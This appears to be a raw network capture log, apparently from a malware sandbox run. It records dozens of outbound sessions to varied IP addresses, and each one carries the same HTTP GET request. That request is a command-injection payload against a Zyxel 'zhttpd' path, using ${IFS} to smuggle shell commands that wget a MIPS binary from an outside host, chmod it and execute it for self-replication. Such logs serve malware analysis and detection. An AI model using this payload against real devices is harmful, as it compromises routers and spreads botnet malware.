                                      Jan 14, 2024 15:51:04.720860004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9037192.168.2.144064870.123.213.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720892906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9038192.168.2.1458988154.121.152.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720932007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9039192.168.2.1449592184.202.144.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720969915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9040192.168.2.144754869.197.112.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720989943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9041192.168.2.1433622201.124.75.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721035957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9042192.168.2.1441638104.246.146.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721076012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9043192.168.2.143537037.229.80.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721126080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9044192.168.2.1450778152.20.54.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721172094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9045192.168.2.1458904177.178.29.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721196890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9046192.168.2.1440934126.117.60.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721244097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9047192.168.2.1443016177.134.97.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721282959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9048192.168.2.1450572205.114.180.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721319914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9049192.168.2.1436684212.99.120.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721369982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9050192.168.2.144990420.242.234.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721398115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9051192.168.2.1450568198.102.26.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721450090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9052192.168.2.1457364211.209.60.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721491098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9053192.168.2.145800868.238.151.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721524000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9054192.168.2.143373297.168.196.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721563101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9055192.168.2.1453016186.37.1.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721602917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9056192.168.2.143637247.2.134.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721647978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9057192.168.2.144831090.135.78.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721682072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9058192.168.2.1456982108.78.142.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721716881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9059192.168.2.1444614141.205.36.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721750021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9060192.168.2.144988212.130.67.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721805096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9061192.168.2.144584044.231.85.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721834898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9062192.168.2.1440556104.5.240.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721894026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9063192.168.2.1451198202.169.51.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721940041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9064192.168.2.1456508114.139.248.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721977949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9065192.168.2.1454288146.18.155.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.721995115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9066192.168.2.1460770131.132.238.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722038984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9067192.168.2.143474485.24.250.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722090960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9068192.168.2.143902820.246.232.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722121954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9069192.168.2.1433506222.137.195.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722152948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9070192.168.2.1458662207.230.75.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722206116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9071192.168.2.1450694171.201.43.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722232103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9072192.168.2.1435392195.46.185.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722253084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9073192.168.2.1434956128.142.116.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722295046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9074192.168.2.1434416126.169.159.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722340107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9075192.168.2.144361650.8.122.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722376108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9076192.168.2.1459654181.167.252.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722414970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9077192.168.2.1455850122.244.183.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722459078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9078192.168.2.145317488.106.98.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722503901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9079192.168.2.145444665.25.188.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722554922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9080192.168.2.1435604161.207.230.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722583055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9081192.168.2.1440490135.206.228.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722623110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9082192.168.2.1438208113.34.247.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722676992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9083192.168.2.144332068.174.250.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722707033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9084192.168.2.1458420220.189.103.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722745895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9085192.168.2.145867023.90.215.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722805023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9086192.168.2.1436232182.207.32.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722837925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9087192.168.2.146038648.68.210.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722897053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9088192.168.2.1449898218.92.217.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722939014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9089192.168.2.1451494146.94.172.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.722965956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9090192.168.2.1460992137.242.95.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723001957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9091192.168.2.1436926119.250.150.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723064899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9092192.168.2.1438608138.121.131.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723093987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9093192.168.2.1449622205.144.120.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723124981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9094192.168.2.145779663.151.43.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723149061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9095192.168.2.1445248126.2.249.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723189116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9096192.168.2.143306414.25.114.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723202944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9097192.168.2.1445858129.241.174.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723238945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9098192.168.2.143704850.77.3.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723293066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9099192.168.2.144095651.101.103.78443
                                      TimestampBytes transferredDirectionData
